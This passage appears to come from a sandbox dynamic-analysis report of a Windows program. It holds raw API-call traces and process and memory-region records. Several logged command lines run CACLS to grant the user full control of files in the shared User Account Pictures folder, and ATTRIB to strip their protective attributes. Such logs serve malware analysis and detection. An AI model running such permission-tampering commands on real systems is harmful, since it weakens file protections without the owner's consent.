Pictures\\usertile18.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x20f348*(hProcess=0x50, hThread=0x4c, dwProcessId=0xeac, dwThreadId=0xe3c)) returned 1 [0183.000] CloseHandle (hObject=0x4c) returned 1 [0183.000] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.000] GetEnvironmentStringsW () returned 0x400308* [0183.000] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0183.000] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0183.043] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f23c | out: lpExitCode=0x20f23c*=0x0) returned 1 [0183.043] CloseHandle (hObject=0x50) returned 1 [0183.044] _vsnwprintf (in: _Buffer=0x20f384, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f248 | out: _Buffer="00000000") returned 8 [0183.044] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0183.044] GetEnvironmentStringsW () returned 0x402410* [0183.044] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0183.044] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.044] GetEnvironmentStringsW () returned 0x402410* [0183.044] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0183.044] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f2a0 | out: lpAttributeList=0x20f2a0) [0183.044] GetConsoleTitleW (in: lpConsoleTitle=0x20f684, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.044] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.045] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0183.045] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.045] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0xffffffff [0183.045] GetLastError () returned 0x2 [0183.045] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0xffffffff [0183.045] GetLastError () returned 0x2 [0183.045] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0x3fe4d8 [0183.045] FindClose (in: hFindFile=0x3fe4d8 | out: hFindFile=0x3fe4d8) returned 1 [0183.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0xffffffff [0183.046] GetLastError () returned 0x2 [0183.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0x3fe4d8 [0183.046] FindClose (in: hFindFile=0x3fe4d8 | out: hFindFile=0x3fe4d8) returned 1 [0183.046] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0183.046] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0183.046] GetConsoleTitleW (in: lpConsoleTitle=0x20f418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.046] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f2a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f368 | out: lpAttributeList=0x20f2a0, lpSize=0x20f368) returned 1 [0183.046] UpdateProcThreadAttribute (in: lpAttributeList=0x20f2a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f360, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f2a0, lpPreviousValue=0x0) returned 1 [0183.046] GetStartupInfoW (in: lpStartupInfo=0x20f25c | out: lpStartupInfo=0x20f25c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0183.046] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0183.046] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f2fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f348 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"", lpProcessInformation=0x20f348*(hProcess=0x4c, hThread=0x50, dwProcessId=0xe4c, dwThreadId=0xf50)) returned 1 [0183.048] CloseHandle (hObject=0x50) returned 1 [0183.048] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.048] GetEnvironmentStringsW () returned 0x402410* [0183.049] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0183.049] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0183.089] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x20f23c | out: lpExitCode=0x20f23c*=0x0) returned 1 [0183.089] CloseHandle (hObject=0x4c) returned 1 [0183.089] _vsnwprintf (in: _Buffer=0x20f384, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f248 | out: _Buffer="00000000") returned 8 [0183.089] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0183.089] GetEnvironmentStringsW () returned 0x402410* [0183.090] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0183.090] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.090] GetEnvironmentStringsW () returned 0x402410* [0183.090] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0183.090] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f2a0 | out: lpAttributeList=0x20f2a0) [0183.090] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.090] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0183.090] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.090] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0183.090] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.090] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0183.090] SetConsoleInputExeNameW () returned 0x1 [0183.090] GetConsoleOutputCP () returned 0x1b5 [0183.090] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.090] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.091] exit (_Code=0) Process: id = "353" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xeac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "352" os_parent_pid = "0xd9c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25874 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25875 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25876 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25877 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 25878 start_va = 0x4b0000 end_va = 0x4b8fff entry_point = 0x4b0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25879 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25880 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25881 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25882 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 25883 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25884 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25885 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25886 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25887 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 25888 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 25889 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25890 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25891 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25892 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25893 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25894 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25895 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 507 os_tid = 0xe3c Thread: id = 508 os_tid = 0xe20 Process: id = "354" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xe4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "352" os_parent_pid = "0xd9c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25896 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25897 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25898 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25899 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 25900 start_va = 0x5f0000 end_va = 0x5f6fff entry_point = 0x5f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25901 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25902 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25903 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25904 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 25905 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25906 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25907 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25908 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25909 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 25910 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 25911 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25912 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25913 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25914 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25915 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25916 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25917 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25918 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25919 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25920 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25921 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25922 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25923 start_va = 0x170000 end_va = 0x237fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 25924 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25925 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 509 os_tid = 0xf50 Process: id = "355" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25926 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25927 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25928 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25929 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 25930 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25931 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25932 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25933 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25934 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25935 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25936 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25937 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25938 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 25939 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25940 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 25941 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25942 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25943 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25944 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25945 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25946 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25947 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25948 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25949 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25950 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 25951 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25952 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25953 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 25954 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 25955 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 25956 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 25957 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 25958 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 25959 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Region: id = 25960 start_va = 0x12e0000 end_va = 0x15aefff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 510 os_tid = 0xee0 [0183.177] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f844 | out: lpSystemTimeAsFileTime=0x30f844*(dwLowDateTime=0xa215bfa0, dwHighDateTime=0x1d440a9)) [0183.177] GetCurrentProcessId () returned 0xe58 [0183.177] GetCurrentThreadId () returned 0xee0 [0183.177] GetTickCount () returned 0x3477a [0183.177] QueryPerformanceCounter (in: lpPerformanceCount=0x30f83c | out: lpPerformanceCount=0x30f83c*=23996660001) returned 1 [0183.178] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0183.178] __set_app_type (_Type=0x1) [0183.178] __p__fmode () returned 0x76b331f4 [0183.178] __p__commode () returned 0x76b331fc [0183.178] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0183.178] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0183.179] GetCurrentThreadId () returned 0xee0 [0183.179] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xee0) returned 0x38 [0183.179] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0183.179] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0183.179] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.179] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0183.179] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f7d4 | out: phkResult=0x30f7d4*=0x0) returned 0x2 [0183.179] VirtualQuery (in: lpAddress=0x30f80b, lpBuffer=0x30f7a4, 